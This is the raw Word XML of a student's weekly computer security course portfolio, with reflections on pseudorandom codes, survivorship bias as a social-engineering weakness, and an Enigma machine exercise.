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5B24F" w14:textId="7966F5C7" w:rsidR="6816F7BF" w:rsidRPr="00ED5F6D" w:rsidRDefault="5146400E" w:rsidP="316224EB">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>COMP6</w:t>
      </w:r>
      <w:r w:rsidR="7C7DC266" w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">41 Week </w:t>
      </w:r>
      <w:r w:rsidR="16168886" w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> Portfolio </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2119C823" w14:textId="64D3BB2D" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143D4C8C" w14:textId="373CDBBE"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 xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidR="00901E67" w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Thomas Gosman</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE12D93" w14:textId="4FB5A8D0" w:rsidR="6816F7BF" w:rsidRPr="00ED5F6D" w:rsidRDefault="6816F7BF" w:rsidP="42D4980C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>zID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00901E67" w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> z5425064</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFEE0FC" w14:textId="72163228"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Date Submitted:</w:t>
      </w:r>
      <w:r w:rsidR="005656F6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 17/06/27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6AF247" w14:textId="19E61ECE" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CCD295C" w14:textId="3660408D" w:rsidR="50317446" w:rsidRPr="00ED5F6D" w:rsidRDefault="64F38000" w:rsidP="42D4980C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="270"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5FA490" w14:textId="6BC05748" w:rsidR="50317446" w:rsidRPr="00ED5F6D" w:rsidRDefault="35222D9E" w:rsidP="181B8E52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidRPr="007E5820">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:highlight w:val="green"/>
          </w:rPr>
          <w:t>Security Everywhere</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w14:paraId="05BD8472" w14:textId="77777777" w:rsidTr="181B8E52">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D896A84" w14:textId="77777777" w:rsidR="00244F69" w:rsidRDefault="00244F69" w:rsidP="00244F69">
            <w:r w:rsidRPr="00244F69">
              <w:t xml:space="preserve">I found this article interesting because it connects closely to the encryption principles covered this week while also highlighting an important security risk. The article discusses pseudorandom code generation, where signals are designed to have high entropy and low </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00244F69">
              <w:t>correlation</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00244F69">
              <w:t xml:space="preserve"> so they are difficult to predict, intercept, or replicate. This is </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00244F69">
              <w:t>similar to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00244F69">
              <w:t xml:space="preserve"> cryptographic key generation, where randomness is essential for maintaining security.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06E09B4A" w14:textId="77777777" w:rsidR="00244F69" w:rsidRPr="00244F69" w:rsidRDefault="00244F69" w:rsidP="00244F69"/>
          <w:p w14:paraId="6BC81208" w14:textId="77777777" w:rsidR="00244F69" w:rsidRDefault="00244F69" w:rsidP="00244F69">
            <w:r w:rsidRPr="00244F69">
              <w:t>What stood out to me was that the article explains how physical effects such as Doppler shift can introduce correlation into transmitted codes. This creates a security risk because a system that appears secure in theory may become more predictable when deployed in a real environment. The article also notes that some algorithms only guarantee desirable security properties for fixed code lengths, meaning their effectiveness depends on assumptions that may not always hold in practice.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C172F09" w14:textId="77777777" w:rsidR="00244F69" w:rsidRPr="00244F69" w:rsidRDefault="00244F69" w:rsidP="00244F69"/>
          <w:p w14:paraId="7568B311" w14:textId="0A09C141" w:rsidR="00244F69" w:rsidRPr="00244F69" w:rsidRDefault="00244F69" w:rsidP="00244F69">
            <w:r w:rsidRPr="00244F69">
              <w:t xml:space="preserve">This reminded me that risk in security is not limited to weaknesses in algorithms. </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Real world </w:t>
            </w:r>
            <w:r w:rsidRPr="00244F69">
              <w:t>factors such as environmental conditions, implementation details, and incorrect assumptions can reduce the security of a system even when the underlying design is mathematically sound. It also affects the resources required by an attacker, as detecting and exploiting small correlations may require increasingly advanced receivers, signal processing techniques, and computational power. As a result, security often depends not only on whether a system can be broken, but also on the practical difficulty and cost of doing so.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51CC8241" w14:textId="78DB4C54" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="067A8EE4" w14:textId="5AE563B9" w:rsidR="001D4E4C" w:rsidRDefault="001D4E4C" w:rsidP="181B8E52">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5063100A" wp14:editId="477345E9">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>2929890</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>0</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2744470" cy="2129155"/>
                  <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="20243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44470" cy="21291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3FFAB3B7" wp14:editId="2D8BDB49">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>1905</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>3810</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2912110" cy="1921510"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="1663794505" name="Picture 2" descr="Understanding Quadrature Amplitude Modulation (QAM) and Its Applications -  Rah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Quadrature Amplitude Modulation (QAM) and Its Applications -  Rahsof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12110" cy="1921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8EFF45" w14:textId="5E98BB21" w:rsidR="001D4E4C" w:rsidRDefault="001D4E4C" w:rsidP="181B8E52">
            <w:r>
              <w:t xml:space="preserve">Left: Example of a QAM coding scheme waveform from [1] </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Right :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> System diagram of how coding works from [2]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="255F9EEB" w14:textId="77777777" w:rsidR="001D4E4C" w:rsidRDefault="001D4E4C" w:rsidP="181B8E52"/>
          <w:p w14:paraId="751A3B2C" w14:textId="3F62421C" w:rsidR="008A5A2F" w:rsidRDefault="00F34953" w:rsidP="181B8E52">
            <w:r>
              <w:t>Link:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29C7BDC7" w14:textId="33D5C5C6" w:rsidR="008A5A2F" w:rsidRPr="001D4E4C" w:rsidRDefault="008A5A2F" w:rsidP="181B8E52">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId11" w:history="1">
              <w:r w:rsidRPr="001D4E4C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:i/>
                  <w:iCs/>
                </w:rPr>
                <w:t>https://insidegnss.com/codes-the-prn-family-grows-again/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="001D4E4C">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C4A28D2" w14:textId="71606AD8" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="589BEFD4" w14:textId="02332F07" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="4474B3E0" w14:textId="6105E153" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="5ED3428E" w14:textId="038A15B2" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="21A34823" w14:textId="366D6F02" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="4671EB08" w14:textId="2A2874F1" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="1D9BB07E" w14:textId="16349E02" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19BF2080" w14:textId="6D936089" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
    <w:p w14:paraId="4BDB72BC" w14:textId="62D27F17" w:rsidR="37D07EEC" w:rsidRPr="00BE4F31" w:rsidRDefault="6685B08B" w:rsidP="42D4980C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="270"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE4F31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Humans, Measuring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C648BC" w14:textId="5F9EB89F" w:rsidR="336AB2E5" w:rsidRPr="00ED5F6D" w:rsidRDefault="37D07EEC" w:rsidP="371C62D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidRPr="00BE4F31">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:highlight w:val="green"/>
          </w:rPr>
          <w:t>Research a Cognitive Vulnerability</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w14:paraId="676A6E2F" w14:textId="77777777" w:rsidTr="181B8E52">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D66B848" w14:textId="005BBF0E" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="008825CF" w:rsidP="181B8E52">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5F6D">
              <w:t xml:space="preserve">Title: </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5F6D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Beware survivorship bias in advice on science careers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3A8533" w14:textId="553005F2" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="00AB26CD" w:rsidP="181B8E52">
            <w:r w:rsidRPr="00ED5F6D">
              <w:t xml:space="preserve">Link: </w:t>
            </w:r>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidRPr="00ED5F6D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www-nature-com.wwwproxy1.library.unsw.edu.au/articles/d41586-021-02634-z</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00ED5F6D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="705E6C68" w14:textId="77A9F2C4" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="78680083" w14:textId="77777777" w:rsidR="00D44FAA" w:rsidRDefault="0038476D" w:rsidP="181B8E52">
            <w:r w:rsidRPr="00ED5F6D">
              <w:t xml:space="preserve">The article published above explores anecdotally the survivorship bias present often in career advice. The article deduces that often advice is taken from senior members of a career path or field of research, whilst this appears wise there is an inherent biasing effect. This is because the senior members that remain will be the sample of successful people in their career as failed attempts will have either left that career path or changed their field of research. Hence often for career research we only hear from the successful side of the story rather than a balanced view. This can make us perceive that the pathway and probability of success to be more deterministic and in a </w:t>
            </w:r>
            <w:r w:rsidR="00ED5F6D" w:rsidRPr="00ED5F6D">
              <w:t>person’s</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5F6D">
              <w:t xml:space="preserve"> favour </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00ED5F6D">
              <w:t>than in reality</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00ED5F6D">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="707B486E" w14:textId="12C991C7" w:rsidR="005E24F1" w:rsidRDefault="005E24F1">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="482BF733" wp14:editId="79767977">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-2307</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>72</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4027990" cy="3219241"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="6069474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7990" cy="3219241"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DCC42FA" w14:textId="77777777" w:rsidR="005E24F1" w:rsidRDefault="005E24F1"/>
          <w:p w14:paraId="22A03408" w14:textId="59EA43B4" w:rsidR="00E9362C" w:rsidRDefault="005E24F1">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="203E0B2A" wp14:editId="5EF43399">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>167005</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>2863850</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="3858895" cy="541020"/>
                      <wp:effectExtent l="0" t="0" r="8255" b="0"/>
                      <wp:wrapSquare wrapText="bothSides"/>
                      <wp:docPr id="1574389247" name="Text Box 1"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr txBox="1"/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="3858895" cy="541020"/>
                              </a:xfrm>
                              <a:prstGeom prst="rect">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:prstClr val="white"/>
                              </a:solidFill>
                              <a:ln>
                                <a:noFill/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="27645938" w14:textId="2FB5EB3B" w:rsidR="005E24F1" w:rsidRPr="007608E9" w:rsidRDefault="005E24F1" w:rsidP="005E24F1">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Survivorship Bias </w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00DB31A1">
                                    <w:t xml:space="preserve">during the Second World War, the bullet holes on aircraft that returned marked out the areas that were not crucial to the planes’ </w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r w:rsidRPr="00DB31A1">
                                    <w:t>integrity.Credit</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r w:rsidRPr="00DB31A1">
                                    <w:t xml:space="preserve">: Martin Grandjean (vector), </w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r w:rsidRPr="00DB31A1">
                                    <w:t>McGeddon</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                  <w:r w:rsidRPr="00DB31A1">
                                    <w:t xml:space="preserve"> (picture), Cameron Moll (concept) (CC BY-SA 4.0)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3E0B2A" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                      <v:stroke joinstyle="miter"/>
                      <v:path gradientshapeok="t" o:connecttype="rect"/>
                    </v:shapetype>
                    <v:shape id="Text Box 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:13.15pt;margin-top:225.5pt;width:303.85pt;height:42.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" stroked="f">
                      <v:textbox inset="0,0,0,0">
                        <w:txbxContent>
                          <w:p w14:paraId="27645938" w14:textId="2FB5EB3B" w:rsidR="005E24F1" w:rsidRPr="007608E9" w:rsidRDefault="005E24F1" w:rsidP="005E24F1">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Survivorship Bias </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00DB31A1">
                              <w:t xml:space="preserve">during the Second World War, the bullet holes on aircraft that returned marked out the areas that were not crucial to the planes’ </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="00DB31A1">
                              <w:t>integrity.Credit</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="00DB31A1">
                              <w:t xml:space="preserve">: Martin Grandjean (vector), </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00DB31A1">
                              <w:t>McGeddon</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00DB31A1">
                              <w:t xml:space="preserve"> (picture), Cameron Moll (concept) (CC BY-SA 4.0)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                      <w10:wrap type="square"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00E9362C">
              <w:t>When applied to a security context, survivorship bias can make a person’s behaviour easier to predict. For example, someone may strongly admire senior mentors, supervisors in high-paying industries, or relatives who have succeeded in selective fields. An attacker could use this pattern to create a social engineering scenario that feels personally relevant and trustworthy. They might impersonate or compromise the profile of a respected person in an engineering field, then send targeted information or opportunities that align with the victim’s career goals and fulfill the ease of progression that the victim is expecting. Because the message appears connected to someone the victim admires, the victim may be more willing to take risks they would usually question. This could help the attacker build trust, influence communication, and gradually create more opportunities to exploit the victim.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AE2330A" w14:textId="199B297D" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="285F3090" w14:textId="5D67B1BC" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7613E10F" w14:textId="77777777" w:rsidR="00E45EA2" w:rsidRPr="00ED5F6D" w:rsidRDefault="00E45EA2" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB4B761" w14:textId="0520DAEB" w:rsidR="1D136FCE" w:rsidRPr="00ED5F6D" w:rsidRDefault="3297DC1F" w:rsidP="371C62D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidRPr="00ED5F6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Enigma Machine</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w14:paraId="09476DC2" w14:textId="77777777" w:rsidTr="181B8E52">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FE613B4" w14:textId="77777777" w:rsidR="007A2B7C" w:rsidRPr="007A2B7C" w:rsidRDefault="007A2B7C" w:rsidP="007A2B7C">
            <w:r w:rsidRPr="007A2B7C">
              <w:t>Favourite Word: XBEBNXBVUP</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2B7C">
              <w:br/>
              <w:t xml:space="preserve">Reason: It's </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007A2B7C">
              <w:t>a really interesting</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007A2B7C">
              <w:t xml:space="preserve"> concept that shaped my view of privacy.</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2B7C">
              <w:br/>
              <w:t>Rotor Order: II, III, I</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2B7C">
              <w:br/>
              <w:t>Reflector: B</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2B7C">
              <w:br/>
              <w:t>Starting Position: JJJ</w:t>
